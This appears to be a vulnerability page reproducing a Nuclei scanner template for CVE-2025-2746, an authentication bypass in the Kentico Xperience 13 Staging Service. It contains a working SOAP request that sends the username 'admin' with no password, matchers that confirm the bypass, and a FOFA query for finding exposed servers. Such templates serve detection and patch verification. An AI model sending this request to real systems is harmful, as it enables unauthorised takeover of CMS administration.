漏洞描述
Before Kentico Xperience 13 Hotfix 173, this vulnerability can be exploited with any username provided. For Hotfix >= 173 and < 178, this vulnerability can be exploited only if you provide a valid Staging Service username (default: admin)
CVE-2025-2746: Kentico Xperience 13 CMS - Staging Service Authentication Bypass (WT-2025-0011)
PoC代码[已公开]
id: CVE-2025-2746
info:
name: Kentico Xperience 13 CMS - Staging Service Authentication Bypass (WT-2025-0011)
author: DhiyaneshDK
severity: critical
description: |
Before Kentico Xperience 13 Hotfix 173, this vulnerability can be exploited with any username provided. For Hotfix >= 173 and < 178, this vulnerability can be exploited only if you provide a valid Staging Service username (default: admin)
impact: |
Unauthenticated attackers can bypass authentication in the Staging Service using any username (or valid username depending on hotfix version), potentially gaining control of administrative objects and compromising the entire CMS.
remediation: |
Upgrade to Kentico Xperience 13 Hotfix 178 or later that properly validates Staging Service authentication.
reference:
- https://github.com/watchtowrlabs/kentico-xperience13-AuthBypass-wt-2025-0011
- https://devnet.kentico.com/download/hotfixes
- https://labs.watchtowr.com/bypassing-authentication-like-its-the-90s-pre-auth-rce-chain-s-in-kentico-xperience-cms/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-2746
cwe-id: CWE-287
epss-score: 0.87412
epss-percentile: 0.99428
metadata:
verified: true
max-request: 1
fofa-query: app="Kentico-CMS"
tags: cve,cve2025,kentico,stag,auth-bypass,xperience13,vuln,kev,vkev
variables:
rand: "{{to_lower(rand_text_alpha(32))}}"
http:
- raw:
- |
POST /CMSPages/Staging/SyncServer.asmx HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: text/xml; charset=utf-8
SOAPAction: http://localhost/SyncWebService/SyncServer/ProcessSynchronizationTaskData
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<wsse:Security xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
<wsse:UsernameToken>
<wsse:Username>admin</wsse:Username>
</wsse:UsernameToken>
</wsse:Security>
</soap:Header>
<soap:Body>
<ProcessSynchronizationTaskData xmlns="http://localhost/SyncWebService/SyncServer">
<stagingTaskData><![CDATA[<{{rand}}>]]></stagingTaskData>
</ProcessSynchronizationTaskData>
</soap:Body>
</soap:Envelope>
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{rand}}"
- "<wsa:Action>"
condition: and
- type: word
part: body
words:
- "Site not running"
- "SyncServer.ErrorLicense"
- "SyncServer.ErrorServiceNotEnabled"
- "Staging service is not enabled on this server"
- "Staging does not work with blank password"
- "Missing X509 certificate token"
- "The security token could not be authenticated or authorized"
condition: or
negative: true
- type: word
part: content_type
words:
- "text/xml"
# digest: 4b0a00483046022100b24f712786d4392dadbb8078d0fe585550267d89423d39416eb1eb745317e542022100f34000ec8d8e0ad41f815f51512a9061906286ea75fa5a75a966ba66fa1ff1fe:922c64590222798bb761d5b6d8e72950